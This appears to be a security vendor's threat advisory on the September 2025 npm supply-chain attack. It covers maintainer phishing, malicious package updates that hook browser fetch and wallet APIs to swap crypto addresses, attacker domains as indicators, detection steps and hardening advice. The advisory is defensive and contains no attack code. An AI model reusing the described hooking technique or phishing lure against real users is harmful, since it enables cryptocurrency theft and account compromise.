top of page

npm Supply-Chain Attack via Phishing Campaign

September 12th, 2025

High

Our Cyber Threat Intelligence Unit has identified an active supply-chain attack in the npm ecosystem. Threat actors compromised maintainer accounts through phishing emails impersonating npm support and published malicious updates to widely used packages using these stolen credentials. The injected malware intercepts browser and Web3 wallet activity, manipulates API calls, and replaces cryptocurrency wallet addresses during signing. Although the attack had a limited window of exposure (~9:00–11:30 a.m. ET on September 8, 2025), the widespread popularity of the affected packages has created significant downstream risks and poses a serious threat to organizations. 

Technical Details

  • Attack Type: Supply-chain compromise / client-side crypto-stealer.

  • Severity: High.

  • Delivery: Malicious npm package versions published following maintainer credential theft via phishing (support@npmjs[.]help, domain npmjs[.]help).

  • Technique:

    • Injected JavaScript hooks into fetch, XMLHttpRequest, and wallet APIs (e.g., window.ethereum).

    • Intercepts web responses and DOM elements containing crypto addresses, rewriting destinations to attacker wallets.

    • Credential harvesting via phishing portal with exfiltration to:

  • Malware Behavior:

    • API hooking for browser-based crypto theft.

    • Exfiltration of developer credentials.

    • Secondary use of obfuscated inline JavaScript in index.js

  • Affected Components:

    • npm ecosystem (core utility packages, see IOC section).

    • Browser runtimes / client-side JS.

    • Cryptocurrency wallets (Metamask, Web3 providers).

Image by ThisisEngineering

Impact

  • Cryptocurrency Diversion: Browser-based address swapping enables theft at the signing stage.

  • Supply-Chain Reach: Packages that are affected collectively receive billions of weekly downloads, increasing exposure even through transitive dependencies.

  • Limiting Factors: Only projects that performed fresh installs or generated lockfiles during the ~2-hour compromise window were affected.

Detection Method

  • Network Monitoring: Flag outbound connections to websocket-api2[.]publicvm.com and domains mimicking npm support.

  • Dependency Review:

    • Audit package-lock.json / yarn.lock for entries created between Sep 8, 09:00–11:30 a.m. ET.

    • Validate against clean package versions.

  • Static Analysis: Scan bundled JS for:

    • Unexpected hooks into fetch, XMLHttpRequest, and window.ethereum.

    • Obfuscated inline code strings (e.g., checkethereumw).

  • Build Logs: Review npm install and system audit logs for anomalies during the compromise window.

Indicators of Compromise

Type 

Indicator 

SHA-256 Hash 

c00a2d757349bfff4d7e0665446101d2ab46a1734308cb3704f93d20dc7aac23 

 

mix of red, purple, orange, blue bubble shape waves horizontal for cybersecurity and netwo

Recommendations

  • Containment: Rebuild production artifacts from verified commits and lockfiles created before September 8. Pin trusted versions, then regenerate the lockfiles.

  • Hardening: Enforce mandatory MFA and phishing-resistant 2FA (FIDO/WebAuthn) for npm maintainers. Implement organization-level package ownership and restricted publishing rights.

  • Monitoring: Continuously monitor for npm supply-chain anomalies. Set up alerts for outbound connections to known command-and-control servers and suspicious npm lookalikes.

  • Phishing Awareness: Roll out training for developers managing registry accounts to raise awareness about phishing.

Conclusion

This incident highlights the systemic risks present in software supply chains. By compromising a single maintainer account, attackers were able to distribute malicious code that spread downstream to billions of potential installations. Although the short two-hour exposure window and quick community response minimized damages, the campaign illustrates how quickly trust in widely used registries can be weaponized. We urge organizations to prioritize maintainer account security, reproducible builds, and ongoing dependency monitoring to reduce exposure to similar large-scale compromises in the future.

bottom of page